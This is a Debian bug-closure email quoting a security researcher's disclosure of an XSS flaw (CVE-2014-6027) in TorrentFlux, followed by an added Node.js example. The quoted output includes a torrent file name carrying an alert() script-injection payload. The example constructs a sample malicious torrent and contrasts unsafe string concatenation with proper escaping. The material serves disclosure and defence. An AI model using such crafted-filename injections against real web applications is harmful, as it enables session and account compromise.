Your message dated Wed, 10 Sep 2014 10:40:15 +0000
with message-id <e1xrfjv-00052m...@franck.debian.org>
and subject line Bug#761008: Removed package(s) from unstable
has caused the Debian Bug report #759574,
regarding torrentflux: CVE-2014-6027: XSS in TorrentFlux
to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)
--
759574: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=759574
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---
Package: torrentflux
Version: 2.4.5-1
The XSS can be triggered by an unauthenticated attacker. A malicious
torrent file such as the POC attached can be crafted and shared by an
attacker. Upon starting the download from Torrentflux, some of the file
contents are pasted without output encoding into a script section,
triggering the XSS. An alternate vector (authenticated) is for an attacker
to upload the torrent file to his own account and subsequently share a link
to the torrent's details
(http://www.vulnserver.com/torrentflux/details.php?torrent=pclinuxos_kde_2013.12.torrent).
</td></tr></table><br><div align="left" id="BodyLayer" name="BodyLayer" style="border: thin solid #000000; position:relative; width:740; height:500; padding-left: 5px; padding-right: 5px; z-index:1; overflow: scroll; visibility: visible">
<link rel="StyleSheet" href="dtree.css" type="text/css" /><script type="text/javascript" src="dtree.js"></script>
<table>
<tr><tr><td width="110">Metainfo File:</td><td>pclinuxos_kde_2013.12.torrent</td></tr>
<tr><td>Directory Name:</td><td>pclinuxos-kde-2013.12</td></tr>
<tr><td>Announce URL:</td><td>http://linuxtracker.org:2710/00000000000000000000000000000000/announce</td></tr>
<tr><td valign="top">Comment:</td><td>pclinuxos-kde-2013.12</td></tr>
<tr><td>Created:</td><td>December 4, 2013, 12:37 pm</td></tr>
<tr><td>Torrent Size:</td><td>1698693120 (1.58 GB)</td></tr>
<tr><td>Chunk size:</td><td>2097152 (2 MB)</td></tr>
<tr><td>Selected size:</td><td id="sel">0</td></tr>
</table><br>
<form name="priority" action="index.php" method="POST" ><input type="hidden" name="torrent" value="pclinuxos_kde_2013.12.torrent" ><input type="hidden" name="setPriorityOnly" value="true" ><script type="text/javascript">
var sel = 0;
d = new dTree('d');
d.add(4,-1,"/",-1,0);
d.add(0,4,"kde-2013.12.jpg (78175)",-1,78175);
d.add(1,4,"pclinuxos-kde-2013.12.iso (1697839104)",-1,1697839104);
d.add(2,4,"pclinuxos-kde-2013.12.md5sum (60)",-1,60);
d.add(3,4,"X");alert('X');//pg (181733)",-1,181733);
document.write(d);
sel = getSizes();
drawSel();
Please find attached the full proof of concept torrent file.
--
Nicolas Guigo
Senior Security Engineer
iSEC Partners (NCC GROUP)
(206) 948-3687
9C80 28B2 F016 4DA4 24C9 D1D7 129C FDF6 0CDC B828
pclinuxos-kde-2013.12.torrent
Description: application/bittorrent
smime.p7s
Description: S/MIME cryptographic signature
--- End Message ---
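The mechanism the report describes (a file name taken from the torrent's metadata and pasted into a `d.add(...)` call with no output encoding) next to one mitigation, as an added Node.js example; it is not code from the report or from TorrentFlux. The minimal bencode parser, the `SAMPLE_TORRENT` bytes and all function names are this example's own constructions.

```javascript
// Added example; the bencode parser and SAMPLE_TORRENT are constructed here.
// Decode a bencoded buffer into JS values; strings are kept as latin1 text.
function bdecode(buf, pos = 0) {
  const c = String.fromCharCode(buf[pos]);
  if (c === 'i') {                                   // integer: i<digits>e
    const end = buf.indexOf(0x65, pos);
    return [parseInt(buf.toString('latin1', pos + 1, end), 10), end + 1];
  }
  if (c === 'l' || c === 'd') {                      // list or dictionary
    const out = c === 'l' ? [] : {};
    pos += 1;
    while (buf[pos] !== 0x65) {                      // until the closing 'e'
      const [v, next] = bdecode(buf, pos);
      if (c === 'l') { out.push(v); pos = next; }
      else { const [val, n2] = bdecode(buf, next); out[v] = val; pos = n2; }
    }
    return [out, pos + 1];
  }
  const colon = buf.indexOf(0x3a, pos);              // string: <len>:<bytes>
  const len = parseInt(buf.toString('latin1', pos, colon), 10);
  return [buf.toString('latin1', colon + 1, colon + 1 + len), colon + 1 + len];
}

// Constructed sample torrent (not the attached PoC): a single file whose
// name carries the same string that appears in the report's script output.
const SAMPLE_TORRENT = Buffer.from(
  `d4:infod5:filesld6:lengthi181733e4:pathl19:X");alert('X');//pgeee4:name10:sample-kdeee`,
  'latin1');

// Return [{name, size}] for every file listed in a multi-file torrent.
function fileEntries(torrentBuf) {
  const [meta] = bdecode(torrentBuf);
  return meta.info.files.map((f) => ({ name: f.path.join('/'), size: f.length }));
}

// Unsafe: the pattern described in the report, name pasted straight into JS.
function unsafeAddLine(id, name, size) {
  return `d.add(${id},4,"${name} (${size})",-1,${size});`;
}

// Hardened: JSON-encode the string, then \u-escape '/', '<', '>' and the JS
// line terminators, so the literal can neither end early nor close the
// <script> element (e.g. via "</script>") whatever the file name contains.
function jsStringLiteral(s) {
  return JSON.stringify(s).replace(/[<>\/\u2028\u2029]/g,
    (ch) => '\\u' + ch.charCodeAt(0).toString(16).padStart(4, '0'));
}
function safeAddLine(id, name, size) {
  return `d.add(${Number(id)},4,${jsStringLiteral(`${name} (${size})`)},-1,${Number(size)});`;
}
```

With the sample torrent, `unsafeAddLine` reproduces the `d.add(3,...)` line quoted in the report, while `safeAddLine` yields one string argument that the browser hands to `d.add` unchanged.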
--- Begin Message ---
Version: 2.4-5.1+rm
Dear submitter,
as the package torrentflux has just been removed from the Debian archive
unstable we hereby close the associated bug reports. We are sorry
that we couldn't deal with your issue properly.
For details on the removal, please see https://bugs.debian.org/761008
The version of this package that was in Debian prior to this removal
can still be found using http://snapshot.debian.org/.
This message was generated automatically; if you believe that there is
a problem with it please contact the archive administrators by mailing
ftpmas...@ftp-master.debian.org.
Debian distribution maintenance software
pp.
Scott Kitterman (the ftpmaster behind the curtain)
--- End Message ---